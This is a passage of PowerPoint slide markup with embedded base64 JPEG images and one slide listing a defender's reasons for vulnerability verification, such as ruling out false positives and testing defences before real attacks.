descr="data:image/jpeg;base64,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16918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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perspectives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41842" y="1295400"/>
            <a:ext cx="8573558" cy="5029200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Defender Perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	1. Verify vulnerability identification data to rule out “false positive”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	2. Qualitative analysis of security assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	3. Test defensive systems prior to real attacks </a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…VERIFY…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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